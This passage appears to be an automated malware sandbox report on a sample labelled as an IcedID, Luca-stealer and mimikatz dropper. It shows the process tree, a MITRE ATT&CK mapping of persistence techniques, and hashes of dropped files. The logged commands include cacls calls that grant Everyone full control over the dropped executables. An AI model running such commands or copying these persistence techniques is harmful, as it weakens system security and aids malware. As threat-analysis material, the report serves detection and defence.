C:\Windows\system32\cacls.execacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F2⤵PID:5368
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe1⤵PID:5304
-
C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exeC:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5808
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F1⤵PID:1980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6016
-
-
C:\Windows\system32\cacls.execacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F2⤵PID:5452
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Image File Execution Options Injection
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Image File Execution Options Injection
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Filesize4.3MB
MD5fdcd0858c7855fe5d15be5345aec0c19
SHA15b260f84a9b4495ecfc255effae8c6365ca42a01
SHA256c292c41a624026c8c157aaf8f197c57e4d62bf259d6933d382ddefd865006303
SHA512f9102ccabc1e4e8446a1805499871a0c68240f5b23ef1df1ac4d9706600e525f55b57f63faea71c0bbae76437db4b487ced7b9ae76bab7d92895a76a1654af0c
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
7KB
MD5497080fed2000e8b49ee2e97e54036b1
SHA14af3fae881a80355dd09df6e736203c30c4faac5
SHA256756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380
SHA5124f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df
-
Filesize
5KB
MD509d45ae26830115fd8d9cdc2aa640ca5
SHA141a6ad8d88b6999ac8a3ff00dd9641a37ee20933
SHA256cf33a92a05ba3c807447a5f6b7e45577ed53174699241da360876d4f4a2eb2de
SHA5121a97f62f76f6f5a7b668eadb55f08941b1d8dfed4a28c4d7a4f2494ff57e998407ec2d0fedaf7f670eb541b1fda40ca5e429d4d2a87007ec45ea5d10abd93aa5
-
Filesize
105KB
MD56f66a335570b54739990afe1b3f7abd2
SHA1245aafe4f98ee9ea32800affd433a1446112b9e2
SHA2569f843d4a0ec79659e9a45bcede49a4776813deb8d35c7d6b74f17b72d5a34eed
SHA512daa55e9e6a9d9d6ca378a3017170fada5d14c8c6fe5ff7907c4c520b2abbfb9d6212c4258ea99e4b688a52882313dcecc642a58dde854883b799817c28a7dc90
-
Filesize
191B
MD56828bbf954c104a5617b1183fff260a5
SHA1cf2f95850eead7d965efd506da49d1c06f91e456
SHA256c4fcf2486bd076b1ae9611abb5980faf29848163132cdffce9d0c13629b98ce9
SHA5125feb7d786b154cae953b680a852ad862a31af9bacd35d25ebb50c8a7849ee5898c4fc973d5aeda76f67f386793045ee2715185252ed124445fe8fc716677ee6d
-
Filesize
134B
MD52b2796f90932dc3c24db746b874c3e5a
SHA18c179ae387fafe5331dd5ad6a57632b92173fad8
SHA256ddd2f544dd188599ea343567aa4fd2caf2cac8173a0acc67cfca667f90eaddd0
SHA5128046816ed9dbbec32e0347b224397eb9f97c317b8589e90c228f8f67b73a133a8b9c02394e08d49b6c3f48d7e1109be734c50d856ce4ea3cc3d198dee3f4012a
-
Filesize
750B
MD53bb2c47f0a437a02c2817753b3becf1f
SHA1b1d4e62ba0675a57001a8c63349c9cb0af505711
SHA2562e7c49b882f6f841891bcc82da771d5ec5a69fb02be336d6f7fd306c268ddb42
SHA51239642aded900c47c878bda620442f1e708ea4c85742b264cdd98e19e1df4d00c6cb77eb326999c8b8cfad7775c4e4cb35dd0e78cac068e3968275140fa6484b2
-
Filesize
266KB
MD582f23e8e9357e0dccfba2c448179ab4b
SHA19d0cea15ac25a02a22c2e800de0c34767b48da5b
SHA256ebdf414fc030f885d0b75fcb6a39ace2f95b4e6a511fe1f137552dbec8f5f31a
SHA512c55b5b909189c8a149477ba30061ec1eeebd7da728653fb4699c24afc1f24c18051f8acd7b62fc407764b79b6193ecd546b73a1a0655488d40bbd7a2e06d86f0
-
Filesize
72KB
MD52334bb8baf5e062683d8ec67b7ac531e
SHA15419ddccabaa0a0b98fd6783c8341012c40db522
SHA2566c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e
SHA512ee0e3f619f0294e3e67e324cab582dd790ba2c15ae08365c0481fd07e32949428c9f4f4872572f52df02be3cd558c78be8af5696da4731b528019ad6706770f8